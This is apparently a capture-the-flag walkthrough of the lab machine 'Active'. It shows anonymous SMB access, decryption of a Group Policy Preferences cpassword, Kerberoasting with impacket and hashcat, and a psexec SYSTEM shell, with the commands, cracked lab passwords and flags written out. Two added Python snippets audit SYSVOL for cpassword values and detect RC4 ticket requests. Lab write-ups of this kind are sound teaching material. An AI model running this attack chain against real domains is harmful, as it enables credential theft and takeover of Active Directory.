Service overview

Let's run a standard reconnaissance of the host at 10.10.10.100 with nmap:

$ nmap -sV -sC -Pn -p1-65535 -oN 10.10.10.100 10.10.10.100 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-11 13:31 EDT
Nmap scan report for 10.10.10.100
Host is up (0.11s latency).
Not shown: 65512 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-11 17:38:58Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-08-11T17:39:59
|_  start_date: 2023-08-11T06:18:16
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 533.77 seconds

Samba

The machine runs Active Directory and Samba. Let's see what we can find in the network shares:

$ smbclient -L //10.10.10.100
Password for [WORKGROUP\user]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Anonymous access is open! Let's look into the Replication folder.

$ smbclient //10.10.10.100/Replication  
Password for [WORKGROUP\user]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                5217023 blocks of size 4096. 277843 blocks available

Let's download all the files for local inspection.

smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0.2 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (4.6 KiloBytes/sec) (average 1.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0.8 KiloBytes/sec) (average 1.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (2.8 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (8.4 KiloBytes/sec) (average 2.1 KiloBytes/sec)

This looks very much like a backup of group policies. Let's check:

$ find . -iname *group*
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy

Looking through all the files, in one of them we find the account active.htb\SVC_TGS and its encrypted password.

$ cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

Let's decrypt the password with gpp-decrypt:

$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

At this point we have credentials: active.htb\SVC_TGS:GPPstillStandingStrong2k18
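The cpassword above is the MS14-025 weakness: Group Policy Preferences encrypt the value with AES-256 under a key Microsoft itself published, so anyone who can read SYSVOL can recover it, which is exactly what gpp-decrypt does. The audit script below is an added example and not part of the original writeup: it walks a SYSVOL copy or GPO backup, reports every GPP item that still carries a cpassword and checks that the blob decodes to whole AES blocks. The embedded Groups.xml is a constructed copy of the file found above, and the list of GPP file names and account attributes is an assumption based on the standard preference types.

```python
"""Audit Group Policy Preference XML files for embedded cpassword values (MS14-025)."""
import base64
import os
import xml.etree.ElementTree as ET

# GPP preference files that can carry an AES-encrypted cpassword attribute (assumed list)
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml", "DataSources.xml", "Drives.xml", "Printers.xml"}

# Constructed sample mirroring the Groups.xml found in the Replication share
SAMPLE_GROUPS_XML = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS">'
    '<Properties action="U" userName="active.htb\\SVC_TGS" cpassword="edBSHOwhZLTjt/QS9FeIcJ83'
    'mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>'
    '</User></Groups>'
)

def cpassword_ciphertext(cpassword):
    """Decode a cpassword blob. GPP strips the base64 '=' padding, so restore it first;
    a genuine blob is AES-256-CBC output, i.e. a whole number of 16-byte blocks."""
    return base64.b64decode(cpassword + "=" * (-len(cpassword) % 4))

def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element that carries a non-empty cpassword attribute."""
    root = ET.fromstring(xml_text)
    parent = {child: p for p in root.iter() for child in p}  # ET has no parent links
    findings = []
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:
            continue
        # Account is on the Properties element (userName/accountName/runAs) or on the item's name
        account = (elem.get("userName") or elem.get("accountName") or elem.get("runAs")
                   or parent.get(elem, root).get("name", "?"))
        blob = cpassword_ciphertext(cpw)
        findings.append({"source": source, "account": account, "cpassword": cpw,
                         "blob_len": len(blob), "aes_aligned": len(blob) % 16 == 0})
    return findings

def audit_tree(path):
    """Walk a SYSVOL copy or GPO backup and collect findings from every GPP file in it."""
    findings = []
    for dirpath, _, files in os.walk(path):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:
                    findings.extend(find_cpasswords(fh.read(), full))
    return findings
```

Run audit_tree on the downloaded active.htb directory to get the same finding from the real file; any hit means the GPO must be rebuilt without the stored credential and the account's password rotated.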

We can check what these credentials give us access to, but nothing interesting turns up.

$ smbmap -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18 -H 10.10.10.100

        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

LDAP

Using ldapsearch and the service account we obtained, we can query LDAP and list the names of other accounts and groups.

$ ldapsearch -x -H ldap://10.10.10.100 -D "SVC_TGS" -w "GPPstillStandingStrong2k18" -b "dc=active,dc=htb" | grep sAMAccountName
sAMAccountName: Administrator
sAMAccountName: Guest
sAMAccountName: Administrators
sAMAccountName: Users
sAMAccountName: Guests
sAMAccountName: Print Operators
sAMAccountName: Backup Operators
sAMAccountName: Replicator
sAMAccountName: Remote Desktop Users
sAMAccountName: Network Configuration Operators
sAMAccountName: Performance Monitor Users
sAMAccountName: Performance Log Users
sAMAccountName: Distributed COM Users
sAMAccountName: IIS_IUSRS
sAMAccountName: Cryptographic Operators
sAMAccountName: Event Log Readers
sAMAccountName: Certificate Service DCOM Access
sAMAccountName: DC$
sAMAccountName: krbtgt
sAMAccountName: Domain Computers
sAMAccountName: Domain Controllers
sAMAccountName: Schema Admins
sAMAccountName: Enterprise Admins
sAMAccountName: Cert Publishers
sAMAccountName: Domain Admins
sAMAccountName: Domain Users
sAMAccountName: Domain Guests
sAMAccountName: Group Policy Creator Owners
sAMAccountName: RAS and IAS Servers
sAMAccountName: Server Operators
sAMAccountName: Account Operators
sAMAccountName: Pre-Windows 2000 Compatible Access
sAMAccountName: Incoming Forest Trust Builders
sAMAccountName: Windows Authorization Access Group
sAMAccountName: Terminal Server License Servers
sAMAccountName: Allowed RODC Password Replication Group
sAMAccountName: Denied RODC Password Replication Group
sAMAccountName: Read-only Domain Controllers
sAMAccountName: Enterprise Read-only Domain Controllers
sAMAccountName: DnsAdmins
sAMAccountName: DnsUpdateProxy
sAMAccountName: SVC_TGS
sAMAccountName: ian

Let's list only the actual user accounts with impacket-GetADUsers.

$ GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100

Administrator                                         2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 14:50:36.972031  <never>             
SVC_TGS                                               2018-07-18 16:14:38.402764  2018-07-21 10:01:30.320277

Kerberoasting

Let's try the kerberoasting technique. The idea is that we have a user's credentials, which means we can hold a ticket-granting ticket (TGT) issued to us on the strength of our password. With it we can request a ticket-granting service ticket (TGS) for any Service Principal Name (SPN) from the domain controller. Part of the TGS is encrypted with a key derived from the password of the account that owns that SPN, so our task is to make the domain controller issue us such a TGS so that we can brute-force it offline on our local machine.

$ GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-21 11:07:03.723783 
$ impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-08-11 06:13:32.092026             

[-] CCache file is not found. Skipping…
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7ff0963664e13f288f1b32e80163cf2a$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

Let's save the obtained TGS to the file hash.txt and start cracking it.

$ hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
...
Ticketmaster1968
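The $krb5tgs$23$ prefix shows that the service ticket came back encrypted with RC4-HMAC (etype 23, 0x17), which a domain controller records in Security event 4769 as the Ticket Encryption Type. The detection below is an added example, not part of the original writeup: it flags RC4 TGS requests for user accounts that own an SPN (computer accounts and krbtgt are excluded, since their keys are not crackable in practice), grouped per requesting account and source address within a time window. The event records are constructed (including a second service account, svc_backup, that does not exist on this box) and assume the real 4769 field names; the window and threshold are assumptions to tune per domain.

```python
"""Flag Kerberoasting-style TGS requests in Windows Security event 4769 records."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the "$krb5tgs$23$" in the hash above
WINDOW = timedelta(minutes=5)  # assumed grouping window
MIN_DISTINCT_SERVICES = 1  # assumed threshold: any RC4 TGS in an AES-capable domain is suspicious

# Constructed sample of 4769 events; logging them requires the audit subcategory
# "Audit Kerberos Service Ticket Operations" to be enabled on the domain controller.
SAMPLE_EVENTS = [
    {"time": "2023-08-11T06:13:31", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-08-11T06:13:33", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-08-11T06:13:32", "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.14.5", "Status": "0x0"},
    {"time": "2023-08-11T06:14:00", "TargetUserName": "ian@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.50", "Status": "0x0"},
]

def is_roastable_service(name):
    """Computer accounts (DC$) have long random passwords and krbtgt is not a realistic
    cracking target; user accounts that own an SPN, like Administrator here, are."""
    return not name.endswith("$") and name.lower() != "krbtgt"

def detect_kerberoast(events, window=WINDOW, min_services=MIN_DISTINCT_SERVICES):
    """Return alerts as (requester, source_ip, [services]) for successful RC4 TGS
    requests to roastable accounts, when one requester hits >= min_services within window."""
    per_requester = defaultdict(list)
    for ev in events:
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC or ev.get("Status", "0x0") != "0x0":
            continue
        if not is_roastable_service(ev["ServiceName"]):
            continue
        per_requester[(ev["TargetUserName"], ev["IpAddress"])].append(
            (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    alerts = []
    for (user, ip), reqs in per_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            # distinct services requested within `window` of request i
            services = sorted({svc for t, svc in reqs[i:] if t - t0 <= window})
            if len(services) >= min_services:
                alerts.append((user, ip, services))
                break
    return alerts
```

On this domain the alert names SVC_TGS requesting an RC4 ticket for Administrator, the exact request made above; the fix is to set an AES-only, long, rotated password on the SPN-bearing account (or make it a group managed service account) rather than to hide the SPN.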

So we have recovered the Administrator account's password: Administrator:Ticketmaster1968. Now we can log in with psexec.

$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exe
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100…..
[*] Found writable share ADMIN$
[*] Uploading file TnrxlohI.exe
[*] Opening SVCManager on 10.10.10.100…..
[*] Creating service zvhj on 10.10.10.100…..
[*] Starting service zvhj…..
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

User flag

> cd Desktop
> type user.txt
7f1870ed9b70adf9dc2c170f33fe79d2


Root flag

> cd \users\administrator\desktop
> type root.txt
f353ae06c7c90141bf760e8d1e03ce4e
